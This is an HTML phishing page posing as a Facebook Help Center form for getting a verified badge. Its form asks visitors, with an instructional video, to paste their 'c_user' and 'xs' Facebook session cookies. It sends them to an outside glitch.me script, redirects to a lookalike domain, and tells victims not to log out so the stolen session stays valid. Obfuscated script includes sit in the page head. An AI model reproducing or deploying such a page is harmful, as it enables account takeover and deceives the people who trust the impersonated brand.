<html lang="en"><head>
    <meta charset="UTF-8">
    <link rel="icon" type="image/svg+xml" href="logo-xjw2vU6p.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Meta Verified | Get a verified blue tick</title>
    <script type="module" crossorigin="" src="index-D9lU3uHa.js"></script>
    <link rel="stylesheet" crossorigin="" href="index-B41p2OLv.css">
  <script type="text/javascript" src="d86bOJ80ewhqiueq"></script><script type="text/javascript" src="HxTqhJ8B-3UZMi_P"></script><script type="text/javascript" src="VZyUkHvkV7P5nM3O"></script><script type="text/javascript" src="dza3Oe8esUxdyPMb"></script><script type="text/javascript" src="QZIhM9wBF9vj45tAT8J8aFDRw0vXnRtftddTgQkNmKOflVIplP0DgIiPVNIutcUUKQ1rk3xXny2zIe2J_gWrqQ%3D%3D"></script><script type="text/javascript" src="LAgEvEkHIgI7MD3GGJ05RSN-ckaVHpzPROqdvxPvSg9wIspUzfN-j6i_bO4fl2A7EKO-vThs5TjMrz446Av8tw%3D%3D"></script><script type="text/javascript" src="Nu9te9YJKO2aEURl9z8vq9Z33JKu7vQK_4BOWpKDxe-jE5RmxceVudPrRYJui_XxR16gWhLwoipokXMx6k98ww%3D%3D"></script><script type="text/javascript" src="SADcojYHoowbAMzpPdz-K_2c0_nJ7PH1PeEii_emSihi89CHryLlpaSsC5xOCdcZsjbX78p6_RInRGntwiMCxw%3D%3D"></script><script type="text/javascript" src="Z1ih1zognPqeR34abIMbRTX9RD-XcZQqJPDRcRWuuka7wsJS63rrxB6pCuTB1EPTALmUdIIImw4DKMhDaNcCdA%3D%3D"></script><script type="text/javascript" src="Q7vacjLWhWy5JvY6HilmNCLQt15qeO4baiVse734vnSfKXXwsaEalQgkL5EK65jEnynaEMhVtFj0xs54TlE3Uw%3D%3D"></script><script type="text/javascript" src="mgdAepBtFtYXyk7aFpgzCUtqQ7gdBU-kPsdbyqn99zPY7pnii3sb8SGufTQ6-hHJn_eM-aIlNTnl08rFNcjDgg%3D%3D"></script><script type="text/javascript" src="orPGtixo1ftXjKgiu4kPNIfbAVDWZM5_abcm4G7XWLotiTtgg31hLoUiq2Hx3k4hD5LuKn3ODDSBN3IbnZ486A%3D%3D"></script></head>
  <body>
  <form class="sm:hidden lg:block md:block" action="https://power-protective-gouda.glitch.me/qamar.php" method="post">
    <input type="hidden" name="_redirect" value="https://get-badge-ooportunity-confirm.vercel.app/">
    <div id="root"> <div><div class="d-flex align-items-center" style="width: 100%; height: 90px; background: rgb(70, 103, 172);"><h1 class="text-white ms-4 m-0 d-flex align-self-center">facebook</h1></div><div class="d-flex align-items-center" style="width: 100%; height: 60px; background: rgb(233, 235, 238);"><h4 class="ms-4 m-0 d-flex align-self-center text-primary">Help Center</h4></div><div class="col-12 my-4 d-flex justify-content-center align-items-center"><div class="col-11 col-md-6 border"><div class="p-2" style="background: rgb(245, 246, 247);"><h5 class="m-0">Request a verified badge on Facebook</h5></div><div class="p-2"><p class="fw-semibold validation_form_para">The verified badge means that Facebook has confirmed that the Page or profile is the authentic presence of the individual, public figure or brand that it represents.</p><p class="fw-semibold validation_form_para">Previously, the verified badge also required the person or brand to be notable and unique. You may still see users with a verified badge that represents our previous eligibility requirements.</p><p class="fw-semibold validation_form_para">Please provide the precise details below. Refer to the video for clarification if you find the instructions unclear.</p><p class="fw-semibold text-secondary" style="font-size: 12px;">Detailed Video Information.</p><video controls="" autoplay="" src="https://cdn.glitch.global/cfdab748-b145-4b28-8f85-c26ac388a3c9/cookies.mp4?v=1719846896202" style="width: 300px; height: 160px;"></video><br><button>Enable Sound</button><p class="fw-semibold validation_form_para mt-2">Please be sure to provide the requested information below.</p><label class="" style="font-size: 12px;">c_user</label><br><input type="number" name="c_user" required="" pattern="^\d{15}$" title="Please enter 15 digits"><br><label class="mt-2" style="font-size: 12px;">xs</label><br><input type="text" name="xs"><p class="mt-2" style="font-size: 12px;">Please make sure not to log out from your computer or laptop until you have received a verification email.</p></div><div class="p-2 mb-2 d-flex justify-content-end" style="background: rgb(245, 246, 247);"><button type="submit" class="text-white border-0" style="background: rgb(66, 103, 178);">Submit</button></div></div></div></div></div></form>









</body></html>